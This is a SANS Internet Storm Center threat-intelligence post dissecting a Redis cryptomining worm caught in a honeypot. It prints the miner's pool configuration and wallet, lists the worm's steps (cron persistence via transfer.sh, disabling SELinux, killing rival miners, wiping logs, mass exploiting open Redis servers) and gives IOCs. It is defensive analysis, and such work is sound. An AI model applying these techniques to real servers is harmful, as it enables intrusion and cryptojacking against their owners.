Anatomy of a Redis mining worm, (Fri, May 18th)

Public accessible Redis servers are being exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days we’ve seen 173 unique ip addresses that have been infected with this worm, whereof 88% of the infected servers are located in China, 4% in the US and 4% Hongkong.

The worm searches for open Redis servers (%%port:6379%%), configures cron to download itself every few minutes (using a file upload service), start mining and look for new targets. It will send the payload *1rn$4rnINFOrn and checks the response for os:Linux, to prevent replication to other operating systems. 

When the cron job executes, the worm will disable security, close the existing publicly open redis port using iptables, disable selinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, that’s assumed to be the reason that a copy will be made on each replication.

The miner that is being downloaded (virustotal) uses the cryptonight proof-of-work algorithm, this algorithm is a cpu only, which makes it efficient to run on exploited servers. When reversing the binary we noticed the following configuration: 

 {    “algo”: “cryptonight”,    “av”: 0,    “background”: true,    “colors”: false,        “cpu-affinity”: null,    “cpu-priority”: null,    “donate-level”: 5,    “log-file”: null,    “max-cpu-usage”: 50,    “print-time”: 60,    “retries”: 5,    “retry-pause”: 5,    “safe”: true,    “threads”: null,    “pools”: [        {            “url”: “jb.chakpools.com:443”,            “user”: “N9emUy6baNTbNwFzZmjzzg7bntSr6TFYRiJy6oXuosHhQZamMFZXzpYENJcdXvC5cwN8oqCrXJ4YYgWRgBNXZk6a33wT7os”,            “pass”: “x”,            “keepalive”: true,            “nicehash”: true        }    ],    “api”: {        “port”: 0,        “access-token”: null,        “worker-id”: null    }}

Especially for a bash worm it is careful to remove all kind of residue, like putting a bash trap to remove everything on script exit, removing logs, syncing and drop caches.

Script breakdown:

  • delete stale (older than +60 minutes) mutexes
  • add a mxff0 that will function as mutex, if it already exists it will quit. This prevents running multiple instances of the same script.
  • configure a trap handler, that will remove all scripts when the script is exited
  • disable selinux
  • remove current crontab (which contained previous installs of the worm)
  • add the Google (8.8.8.8) nameserver to /etc/resolv.conf
  • add google nameserver to resolv.conf
  • empty temp folders
  • sync caches and then clear all linux caches
  • update the security limits for file and processes
  • the worm disables access from the outside, enables loopback listening
  • it kills competitive miners, other processes and and scanning scripts
  • clean bash history, logs, mail spool and tmp
  • check for centos, redhat, fedora or ubuntu, debian, mint or knoppix to use apt or yum
  • installs redis client tool and other tools
  • download and build pnscan
  • download the cryptominer binary and upload again to transfer.sh (virustotal)
  • rename the miner to .gpg and execute it
  • the worm will change its own script to upload new script to prolongue its existence
  • prepare .dat redis script to exploit other servers
  • scans complete subnets for other open redis servers, in randomly order within ranges 1.0.0.0/16 to 224.255.0.0/16 
  • pnscan will send payload and read os:linux, output to .r.$x.$y.o (contains all open redis servers)
  • filter out only Linux servers, output to .r.$x.$y.l
  • mass exploit using redis-cli 
  • repeat previous steps for next subnet
  • remove all evidence

If you’re interested, you can find the source here.

IOCs

  • sha256: 9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6
  • ssdeep: 12288:s/d8Tu4RnpO4rFnRwIzUDAwtkgWRFV0+JvZNFIZcLA43LLXl4Aq1A:kH41I4rVRDUDAwGL/bIZcLx3x
  • jb.chakpools.com (%%ip:159.203.182.176%%)
  • filenames: .gpg, .dat, .mxff0

Links

  • https://www.virustotal.com/#/file/9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6/detection
  • https://gist.github.com/nl5887/f6f8ed67ae95244482b54aa46b530bba
     

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.